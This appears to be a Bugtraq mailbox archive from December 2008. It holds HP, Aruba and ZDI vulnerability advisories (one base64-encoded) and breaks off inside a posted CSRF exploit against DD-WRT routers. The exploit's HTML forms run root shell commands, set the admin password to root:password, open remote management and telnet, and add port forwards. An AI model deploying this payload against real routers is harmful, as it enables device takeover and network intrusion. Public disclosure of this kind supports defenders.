wx1/cUqmJ2ZR7ShBryz/IPsBRrjzsyfdqd7kWKTofJow+pdFgJDzEPFtPo9w7Db+
RVHSktWqc5qraUnIFW7qwH55TjTrPVFoUOL7uBbsJVdVHNH06tRvPpeQ4SRjdKvO
jDms08jk4pcU/Uz2yBfQJ45Ql5TXedVE0E60CkEzOYmzabM/YfJkSO+yH2SfAl6g
JYguCSe6O2HDQFkEXbKwGsWnZTdg5V2xrTZraU/XZMZc6QvefAv4djc7iM3nwtsi
VNR2cKYpqVF5g+FeSPZtajG3uqZwuCWNmE4TzmjF4vnt59Wq8GmpX/5hpoALC/M=gyJj
-----END PGP SIGNATURE-----

From - Mon Dec  8 15:39:20 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f16
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38858-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 45595ECD5D
for <lists@securityspace.com>; Mon,  8 Dec 2008 15:31:41 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id A30B11437F4; Mon,  8 Dec 2008 11:57:59 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 12085 invoked from network); 8 Dec 2008 19:05:22 -0000
To: bugtraq@securityfocus.com
From: security-alert@hp.com
Subject: [security bulletin] HPSBMA02390 SSRT071481 rev.1 - HP OpenView Performance Agent, HP Performance Agent, Remote Denial of Service (DoS)
Date: Mon, 08 Dec 2008 11:22:27 -0800
Sender: secure@hpchs.cup.hp.com
Message-Id: <20081208192228.5A318BD82@hpchs.cup.hp.com>
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01621724
Version: 1

HPSBMA02390 SSRT071481 rev.1 - HP OpenView Performance Agent, HP Performance Agent, Remote Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2008-12-08
Last Updated: 2008-12-08

Potential Security Impact: Remote Unauthorized Access, Denial of Service (DoS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP OpenView Performance Agent and HP Performance Agent. The vulnerability could be exploited remotely to create a Denial of Service (DoS).

References: CVE-2007-4349

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP OpenView Performance Agent vC.04.60 and vC.04.61 and HP Performance Agent vC.04.70 running on AIX, HP-UX, Linux, Solaris, and Windows

BACKGROUND

CVSS 2.0 Base Metrics 
==============================================Reference                         Base Vector               Base Score 
CVE-2007-4349    (AV:N/AC:M/Au:N/C:N/I:N/A:P)      4.3
==============================================Information on CVSS is documented in HP Customer Notice: HPSN-2008-002.

RESOLUTION

HP has made patches available to resolve the vulnerabilities.

The patches are available from http://support.openview.hp.com/selfsolve/patches 

Operating System - AIX
Resolved in Patch - PACPTAIX_00001 or subsequent
 
Operating System - HP-UX
Resolved in Patch - PACPTHP_00001 or subsequent
 
Operating System - Linux
Resolved in Patch - PACPTLX_00001 or subsequent
 
Operating System - Solaris
Resolved in Patch - PACPTSOL_00001 or subsequent
 
Operating System - Windows
Resolved in Patch - PACPTNT_00001 or subsequent
 


MANUAL ACTIONS: Yes - NonUpdate 
Install patches listed in the Resolution if running Performance Agent 

PRODUCT SPECIFIC INFORMATION 

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see https://www.hp.com/go/swa 

The following text is for use by the HP-UX Software Assistant.

AFFECTED VERSIONS (for HP-UX)

HP-UX B.11.31 
HP-UX B.11.23 
HP-UX B.11.11 
============HPOvLcore.HPOVXPL 
action: install PACPTHP_00001 or subsequent if running Performance Agent 
URL: http://support.openview.hp.com/selfsolve/patches 

END AFFECTED VERSIONS (for HP-UX)

HISTORY 
Version:1 (rev.1) - 8 December 2008 Initial release 

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. 

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com 
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. 
To get the security-alert PGP key, please send an e-mail message as follows:
  To: security-alert@hp.com 
  Subject: get key

Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: 
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC 
On the web page: ITRC security bulletins and patch sign-up 
Under Step1: your ITRC security bulletins and patches 
  - check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems 
  - verify your operating system selections are checked and save.


To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php 
Log in on the web page: Subscriber's choice for Business: sign-in. 
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.


To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do 


* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: 

GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault
 
System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.


"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."

�Copyright 2008 Hewlett-Packard Development Company, L.P. 

Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1

iQA/AwUBSTz9ZuAfOvwtKn1ZEQJHbQCgsRqwNUe7pcLQOOtUJ1CyUBG/S2MAoOP/
0U2050mm3sFESQDsrODARBR4
=1Gnh
-----END PGP SIGNATURE-----

From - Mon Dec  8 15:59:20 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f17
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38863-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id CCE04EC770
for <lists@securityspace.com>; Mon,  8 Dec 2008 15:55:53 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id D7E39143C5B; Mon,  8 Dec 2008 12:00:31 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 12787 invoked from network); 8 Dec 2008 19:33:27 -0000
Message-ID: <493D739A.1010404@arubanetworks.com>
Date: Mon, 08 Dec 2008 11:20:58 -0800
From: "Robbie (Rupinder) Gill" <rgill@arubanetworks.com>
User-Agent: Thunderbird 2.0.0.14 (X11/20080501)
MIME-Version: 1.0
To: bugtraq@securityfocus.com
Subject: DoS Vulnerability in Aruba Mobility Controller Caused by Malformed
 EAP Frame (Aruba Advisory ID: AID-12808)
X-Enigmail-Version: 0.95.6
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-OriginalArrivalTime: 08 Dec 2008 19:50:12.0669 (UTC) FILETIME=[2F01C6D0:01C9596E]
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Aruba Networks Security Advisory

Title: DoS Vulnerability in Aruba Mobility Controller Caused by
Malformed EAP Frame.

Aruba Advisory ID: AID-12808
Revision: 1.0

For Public Release on 12/8/2008

+----------------------------------------------------

SUMMARY

A Denial of Service (DoS) vulnerability was discovered during standard
bug reporting procedures
in the Aruba Mobility Controller. A malformed EAP frame causes a process
crash on the Aruba
Mobility Controller causing a temporary DoS condition for new clients
configured to use EAP
authentication. Prior successful security association is not required to
cause this condition.
The Mobility Controller recovers automatically by restarting the
affected process.


AFFECTED ArubaOS VERSIONS

2.4.8.x-FIPS, 2.5.x, 3.1.x, 3.2.x, 3.3.1.x, and 3.3.2.x versions


DETAILS

Extensible Authentication Protocol (EAP) is a framework used for
authentication in wireless and
point-point connections (RFC 3748). Aruba Mobility Controller accepts
EAP frames on both wireless
interfaces (via its thin APs) and wired interfaces (via devices
connected to untrusted physical
ports on the controller). In 802.11 networks, EAP frames are only used
when WPA/WPA2 Enterprise
modes are being used.

A malformed EAP frame causes a process crash on the Aruba Mobility
Controller. An attacking station
does not need to have completed a successful security association prior
to launching this attack
against the controller.


IMPACT

An attacker can inject a malformed EAP frame and cause a process crash
on the Aruba Mobility
Controller. This causes a service outage for new clients configured to
use EAP authentication.
The Mobility Controller recovers automatically by restarting the
affected process.  An attacker
could however cause a prolonged DoS condition by flooding the Aruba
Mobility Controller with
malicious EAP frames.

For wireless, this vulnerability only applies when operating in WPA/WPA2
Enterprise modes.
WPA/WPA2-PSK modes are unaffected by this vulnerability and so are
open/WEP based wireless networks.
This vulnerability does affect wired devices connected to untrusted
physical ports of the Mobility
Controller.


CVSS v2 BASE METRIC SCORE: 5 (AV:N/AC:L/Au:N/C:N/I:N/A:P)


WORKAROUNDS

Aruba Networks recommends that all customers that are using EAP
authentication apply the
appropriate patch(es) as soon as practical.  However, in the event that
a patch cannot
immediately be applied, the following steps might help in mitigating the
risk:

- - - Aruba Mobility Controllers allows for a mode of operation where a
wireless client's
EAP communication terminates on the controller, rather than on an
authentication server (RADIUS
server, LDAP server etc.). The Mobility Controller in turn queries the
authentication server on
behalf of the client using non EAP messages. This mode is referred to as
"EAP-Offload" and is
immune to this vulnerability. Enabling this mode on the Mobility
Controller can be used as a
workaround until the patch(es) can be applied. EAP-Offload is not
supported for wired client
devices.


SOLUTION

Aruba Networks recommends that all customers apply the appropriate
patch(es) as soon as practical.  However, in the event that a patch
can not immediately be applied, the workaround steps will help to mitigate
the risk.

+----------------------------------------------------

OBTAINING FIXED FIRMWARE

Aruba customers can obtain the firmware on the support website:
http://www.arubanetworks.com/support.

Aruba Support contacts are as follows:

1-800-WiFiLAN (1-800-943-4526) (toll free from within North America)

+1-408-754-1200 (toll call from anywhere in the world)

e-mail: support(at)arubanetworks.com

Please, do not contact either "wsirt(at)arubanetworks.com" or
"security(at)arubanetworks.com" for software upgrades.


EXPLOITATION AND PUBLIC ANNOUNCEMENTS

This vulnerability will be announced at

Aruba W.S.I.R.T. Advisory:
http://www.arubanetworks.com/support/alerts/aid-12808.asc

SecurityFocus Bugtraq
http://www.securityfocus.com/archive/1


STATUS OF THIS NOTICE: Final

Although Aruba Networks cannot guarantee the accuracy of all statements
in this advisory, all of the facts have been checked to the best of our
ability. Aruba Networks does not anticipate issuing updated versions of
this advisory unless there is some material change in the facts. Should
there be a significant change in the facts, Aruba Networks may update
this advisory.

A stand-alone copy or paraphrase of the text of this security advisory
that omits the distribution URL in the following section is an uncontrolled
copy, and may lack important information or contain factual errors.


DISTRIBUTION OF THIS ANNOUNCEMENT

This advisory will be posted on Aruba's website at:
http://www.arubanetworks.com/support/alerts/aid-12808.asc


Future updates of this advisory, if any, will be placed on Aruba's worldwide
website, but may or may not be actively announced on mailing lists or
newsgroups. Users concerned about this problem are encouraged to check the
above URL for any updates.


REVISION HISTORY

~      Revision 1.0 / 12-8-2008 / Initial release


ARUBA WSIRT SECURITY PROCEDURES

Complete information on reporting security vulnerabilities in Aruba Networks
products, obtaining assistance with security incidents is available at
~      http://www.arubanetworks.com/support/wsirt.php


For reporting *NEW* Aruba Networks security issues, email can be sent to
wsirt(at)arubanetworks.com or security(at)arubanetworks.com. For sensitive
information we encourage the use of PGP encryption. Our public keys can be
found at
http://www.arubanetworks.com/support/wsirt.php


~      (c) Copyright 2008 by Aruba Networks, Inc.
This advisory may be redistributed freely after the release date given at
the top of the text, provided that redistributed copies are complete and
unmodified, including all date and version information.



-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org

iEYEARECAAYFAkk9c5kACgkQp6KijA4qefU7vACg4RsVQOwBPeGRdcf7/iOmXQTE
RNcAnRvRz7XFOHeOyRCcMFI5FF1synMd
�RT
-----END PGP SIGNATURE-----

From - Mon Dec  8 16:19:20 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f19
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38862-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id E0B3EEC891
for <lists@securityspace.com>; Mon,  8 Dec 2008 16:09:20 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 8DFD7143C85; Mon,  8 Dec 2008 12:00:01 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 12512 invoked from network); 8 Dec 2008 19:21:54 -0000
X-EDSINT-Source-Ip: 205.142.126.149
From: zdi-disclosures@3com.com
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Cc: zdi-disclosures@3com.com
Subject: ZDI-08-082: BMC PatrolAgent Version Logging Format String Vulnerability
MIME-Version: 1.0
X-Mailer: Lotus Notes Release 7.0.3 September 26, 2007
Message-ID: <OF507B1F01.0DC30233-ON88257519.006BDA86-86257519.006BE620@3com.com>
Sender: Cameron_Hotchkies@3com.com
Date: Mon, 8 Dec 2008 13:38:32 -0600
X-MIMETrack: Serialize by Router on USUT001/US/3Com(Release 6.5.5FP2|October 23, 2006) at
 12/08/2008 11:38:36 AM,
Serialize complete at 12/08/2008 11:38:36 AM
Content-Type: text/plain;
charset="US-ASCII"
Content-Transfer-Encoding: base64
Status:   

WkRJLTA4LTA4MjogQk1DIFBhdHJvbEFnZW50IFZlcnNpb24gTG9nZ2luZyBGb3JtYXQgU3RyaW5n
IFZ1bG5lcmFiaWxpdHkNCmh0dHA6Ly93d3cuemVyb2RheWluaXRpYXRpdmUuY29tL2Fkdmlzb3Jp
ZXMvWkRJLTA4LTA4Mg0KRGVjZW1iZXIgOCwgMjAwOA0KDQotLSBBZmZlY3RlZCBWZW5kb3JzOg0K
Qk1DIFNvZnR3YXJlDQoNCi0tIEFmZmVjdGVkIFByb2R1Y3RzOg0KQk1DIFNvZnR3YXJlIFBhdHJv
bA0KDQotLSBUaXBwaW5nUG9pbnQoVE0pIElQUyBDdXN0b21lciBQcm90ZWN0aW9uOg0KVGlwcGlu
Z1BvaW50IElQUyBjdXN0b21lcnMgaGF2ZSBiZWVuIHByb3RlY3RlZCBhZ2FpbnN0IHRoaXMNCnZ1
bG5lcmFiaWxpdHkgYnkgRGlnaXRhbCBWYWNjaW5lIHByb3RlY3Rpb24gZmlsdGVyIElEIDYxMjku
IA0KRm9yIGZ1cnRoZXIgcHJvZHVjdCBpbmZvcm1hdGlvbiBvbiB0aGUgVGlwcGluZ1BvaW50IElQ
UywgdmlzaXQ6DQoNCiAgICBodHRwOi8vd3d3LnRpcHBpbmdwb2ludC5jb20NCg0KLS0gVnVsbmVy
YWJpbGl0eSBEZXRhaWxzOg0KVGhpcyB2dWxuZXJhYmlsaXR5IGFsbG93cyBhdHRhY2tlcnMgdG8g
ZXhlY3V0ZSBhcmJpdHJhcnkgY29kZSBvbg0KdnVsbmVyYWJsZSBpbnN0YWxsYXRpb25zIG9mIEJN
QyBQYXRyb2xBZ2VudC4gQXV0aGVudGljYXRpb24gaXMgbm90DQpyZXF1aXJlZCB0byBleHBsb2l0
IHRoaXMgdnVsbmVyYWJpbGl0eS4NCg0KVGhlIHNwZWNpZmljIGZsYXcgZXhpc3RzIGR1ZSB0byBh
IGZvcm1hdCBzdHJpbmcgaGFuZGxpbmcgZXJyb3IgZHVyaW5nDQpsb2cgbWVzc2FnZSB3cml0aW5n
LiBTdXBwbHlpbmcgYW4gaW52YWxpZCB2ZXJzaW9uIG51bWJlciBjb250YWluaW5nDQpmb3JtYXQg
c3RyaW5nIHRva2VucyB0byBhIHZ1bG5lcmFibGUgdGFyZ2V0IG9uIFRDUCBwb3J0IDMxODEgdHJp
Z2dlcnMgYW4NCmV4cGxvaXRhYmxlIGZvcm1hdCBzdHJpbmcgdnVsbmVyYWJpbGl0eSB3aGljaCBj
YW4gcmVzdWx0IGluIGFyYml0cmFyeQ0KY29kZSBleGVjdXRpb24uDQoNCi0tIFZlbmRvciBSZXNw
b25zZToNCkJNQyBTb2Z0d2FyZSBzdGF0ZXM6DQpCTUMgaGFzIGlzc3VlZCBhbiB1cGRhdGUgdG8g
Y29ycmVjdCB0aGlzIHZ1bG5lcmFiaWxpdHkuICBDdXN0b21lcnMNCnNob3VsZCB1cGdyYWRlIFBB
VFJPTCBBZ2VudCB0byB2ZXJzaW9uIDMuNy4zMA0KDQotLSBEaXNjbG9zdXJlIFRpbWVsaW5lOg0K
MjAwOC0wNS0wOCAtIFZ1bG5lcmFiaWxpdHkgcmVwb3J0ZWQgdG8gdmVuZG9yDQoyMDA4LTEyLTA4
IC0gQ29vcmRpbmF0ZWQgcHVibGljIHJlbGVhc2Ugb2YgYWR2aXNvcnkNCg0KLS0gQ3JlZGl0Og0K
VGhpcyB2dWxuZXJhYmlsaXR5IHdhcyBkaXNjb3ZlcmVkIGJ5Og0KICAgICogQW5vbnltb3VzDQoN
Ci0tIEFib3V0IHRoZSBaZXJvIERheSBJbml0aWF0aXZlIChaREkpOg0KRXN0YWJsaXNoZWQgYnkg
VGlwcGluZ1BvaW50LCBUaGUgWmVybyBEYXkgSW5pdGlhdGl2ZSAoWkRJKSByZXByZXNlbnRzIA0K
YSBiZXN0LW9mLWJyZWVkIG1vZGVsIGZvciByZXdhcmRpbmcgc2VjdXJpdHkgcmVzZWFyY2hlcnMg
Zm9yIHJlc3BvbnNpYmx5DQpkaXNjbG9zaW5nIGRpc2NvdmVyZWQgdnVsbmVyYWJpbGl0aWVzLg0K
DQpSZXNlYXJjaGVycyBpbnRlcmVzdGVkIGluIGdldHRpbmcgcGFpZCBmb3IgdGhlaXIgc2VjdXJp
dHkgcmVzZWFyY2gNCnRocm91Z2ggdGhlIFpESSBjYW4gZmluZCBtb3JlIGluZm9ybWF0aW9uIGFu
ZCBzaWduLXVwIGF0Og0KDQogICAgaHR0cDovL3d3dy56ZXJvZGF5aW5pdGlhdGl2ZS5jb20NCg0K
VGhlIFpESSBpcyB1bmlxdWUgaW4gaG93IHRoZSBhY3F1aXJlZCB2dWxuZXJhYmlsaXR5IGluZm9y
bWF0aW9uIGlzDQp1c2VkLiBUaXBwaW5nUG9pbnQgZG9lcyBub3QgcmUtc2VsbCB0aGUgdnVsbmVy
YWJpbGl0eSBkZXRhaWxzIG9yIGFueQ0KZXhwbG9pdCBjb2RlLiBJbnN0ZWFkLCB1cG9uIG5vdGlm
eWluZyB0aGUgYWZmZWN0ZWQgcHJvZHVjdCB2ZW5kb3IsDQpUaXBwaW5nUG9pbnQgcHJvdmlkZXMg
aXRzIGN1c3RvbWVycyB3aXRoIHplcm8gZGF5IHByb3RlY3Rpb24gdGhyb3VnaA0KaXRzIGludHJ1
c2lvbiBwcmV2ZW50aW9uIHRlY2hub2xvZ3kuIEV4cGxpY2l0IGRldGFpbHMgcmVnYXJkaW5nIHRo
ZQ0Kc3BlY2lmaWNzIG9mIHRoZSB2dWxuZXJhYmlsaXR5IGFyZSBub3QgZXhwb3NlZCB0byBhbnkg
cGFydGllcyB1bnRpbA0KYW4gb2ZmaWNpYWwgdmVuZG9yIHBhdGNoIGlzIHB1YmxpY2x5IGF2YWls
YWJsZS4gRnVydGhlcm1vcmUsIHdpdGggdGhlDQphbHRydWlzdGljIGFpbSBvZiBoZWxwaW5nIHRv
IHNlY3VyZSBhIGJyb2FkZXIgdXNlciBiYXNlLCBUaXBwaW5nUG9pbnQNCnByb3ZpZGVzIHRoaXMg
dnVsbmVyYWJpbGl0eSBpbmZvcm1hdGlvbiBjb25maWRlbnRpYWxseSB0byBzZWN1cml0eQ0KdmVu
ZG9ycyAoaW5jbHVkaW5nIGNvbXBldGl0b3JzKSB3aG8gaGF2ZSBhIHZ1bG5lcmFiaWxpdHkgcHJv
dGVjdGlvbiBvcg0KbWl0aWdhdGlvbiBwcm9kdWN0Lg0KDQpPdXIgdnVsbmVyYWJpbGl0eSBkaXNj
bG9zdXJlIHBvbGljeSBpcyBhdmFpbGFibGUgb25saW5lIGF0Og0KDQogICAgaHR0cDovL3d3dy56
ZXJvZGF5aW5pdGlhdGl2ZS5jb20vYWR2aXNvcmllcy9kaXNjbG9zdXJlX3BvbGljeS8NCg0KQ09O
RklERU5USUFMSVRZIE5PVElDRTogVGhpcyBlLW1haWwgbWVzc2FnZSwgaW5jbHVkaW5nIGFueSBh
dHRhY2htZW50cywNCmlzIGJlaW5nIHNlbnQgYnkgM0NvbSBmb3IgdGhlIHNvbGUgdXNlIG9mIHRo
ZSBpbnRlbmRlZCByZWNpcGllbnQocykgYW5kDQptYXkgY29udGFpbiBjb25maWRlbnRpYWwsIHBy
b3ByaWV0YXJ5IGFuZC9vciBwcml2aWxlZ2VkIGluZm9ybWF0aW9uLg0KQW55IHVuYXV0aG9yaXpl
ZCByZXZpZXcsIHVzZSwgZGlzY2xvc3VyZSBhbmQvb3IgZGlzdHJpYnV0aW9uIGJ5IGFueSANCnJl
Y2lwaWVudCBpcyBwcm9oaWJpdGVkLiAgSWYgeW91IGFyZSBub3QgdGhlIGludGVuZGVkIHJlY2lw
aWVudCwgcGxlYXNlDQpkZWxldGUgYW5kL29yIGRlc3Ryb3kgYWxsIGNvcGllcyBvZiB0aGlzIG1l
c3NhZ2UgcmVnYXJkbGVzcyBvZiBmb3JtIGFuZA0KYW55IGluY2x1ZGVkIGF0dGFjaG1lbnRzIGFu
ZCBub3RpZnkgM0NvbSBpbW1lZGlhdGVseSBieSBjb250YWN0aW5nIHRoZQ0Kc2VuZGVyIHZpYSBy
ZXBseSBlLW1haWwgb3IgZm9yd2FyZGluZyB0byAzQ29tIGF0IHBvc3RtYXN0ZXJAM2NvbS5jb20u
IA0K

From - Mon Dec  8 17:09:20 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f1c
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38864-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 8AD31ECB38
for <lists@securityspace.com>; Mon,  8 Dec 2008 17:03:01 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 06713236FA5; Mon,  8 Dec 2008 14:49:58 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 25412 invoked from network); 8 Dec 2008 21:30:57 -0000
Date: Mon, 8 Dec 2008 14:35:28 -0700
Message-Id: <200812082135.mB8LZSuc013034@www5.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: th3.r00k.ieatpork@gmail.pork.com
To: bugtraq@securityfocus.com
Subject: Multiple XSRF in DD-WRT (Remote Root Command Execution)
Status:   

Author: Michael Brooks (!!!!)

I usually don't like posting my leet exploits to bugtraq because it is so unprofessional. You guys usually malform my exploits so they are totally useless,  even to someone trying to write a patch! You also tend to get the wrong name!  Michael Brooks wrote this!

Exploits tested on the newest stable version:
Firmware: DD-WRT v24-sp1 (07/27/08) micro
Product Homepage:http://dd-wrt.com/

Impact:
1)Remote root command execution /bin/sh
2)Change web administration password and enable remote administration
3)create new Port Forwarding rules to bypass NAT.

<html>
       <head>
               <meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
       </head>
       Remote root command execution /bin/sh
       <form method="post" action="http://192.168.1.1/apply.cgi" id=1>
               <input name="submit_button" value="Ping" type="hidden">
               <input name="action" value="ApplyTake" type="hidden">
               <input name="submit_type" value="start" type="hidden">
               <input name="change_action" value="gozila_cgi" type="hidden">
               <input name="next_page" value="Diagnostics.asp" type="hidden">
               <input name="ping_ip" value="echo owned">
               <input name="execute command" type="submit">
       </form><br><br>
       enable remote administration and change login to root:password
       <form method="post" action="http://192.168.1.1/apply.cgi">
               <input name="submit_button" value="Management" type="hidden">
               <input name="action" value="ApplyTake" type="hidden">
               <input name="change_action" value="" type="hidden">
               <input name="submit_type" value="" type="hidden">
               <input name="commit" value="1" type="hidden">
               <input name="PasswdModify" value="0" type="hidden">
               <input name="remote_mgt_https" value="" type="hidden">
               <input name="http_enable" value="1" type="hidden">
               <input name="info_passwd" value="0" type="hidden">
               <input name="https_enable" value="" type="hidden">
               <input name="http_username" value="root" type="hidden">
               <input name="http_passwd" value="password" type="hidden">
               <input name="http_passwdConfirm" value="password" type="hidden">
               <input name="_http_enable" value="1" type="hidden">
               <input name="refresh_time" value="3" type="hidden">
               <input name="status_auth" value="1" type="hidden">
               <input name="maskmac" value="1" type="hidden">
               <input name="remote_management" value="1" type="hidden">
               <input name="http_wanport" value="8080" type="hidden">
               <input name="remote_mgt_telnet" value="1" type="hidden">
               <input name="telnet_wanport" value="23" type="hidden">
               <input name="boot_wait" value="on" type="hidden">
               <input name="cron_enable" value="1" type="hidden">
               <input name="cron_jobs" value="" type="hidden">
               <input name="loopback_enable" value="1" type="hidden">
               <input name="nas_enable" value="1" type="hidden">
               <input name="resetbutton_enable" value="1" type="hidden">
               <input name="zebra_enable" value="1" type="hidden">
               <input name="ip_conntrack_max" value="512" type="hidden">
               <input name="ip_conntrack_tcp_timeouts" value="3600" type="hidden">
               <input name="ip_conntrack_udp_timeouts" value="120" type="hidden">
               <input name="overclocking" value="200" type="hidden">
               <input name="router_style" value="yellow" type="hidden">
               <input name="Remote Admin" type="submit">
       </form><br><br>
       Change Port Forwarding to byass NAT protection.
       <form method="post" action="http://192.168.1.1/apply.cgi">
               <input name="submit_button" value="Change Port Forwarding" type="submit">
               <input name="action" value="ApplyTake" type="hidden">
               <input name="change_action" value="" type="hidden">
               <input name="submit_type" value="" type="hidden">
               <input name="forward_spec" value="13" type="hidden">
               <input name="name0" value="Hacked" type="hidden">
               <input name="from0" value="4450" type="hidden">
               <input name="pro0" value="both" type="hidden">
               <input name="ip0" value="192.168.1.100" type="hidden">
               <input name="to0" value="445" type="hidden">
               <input name="enable0" value="on" type="hidden">
               <input name="name1" value="Hacked Again" type="hidden">
               <input name="from1" value="22" type="hidden">
               <input name="pro1" value="tcp" type="hidden">
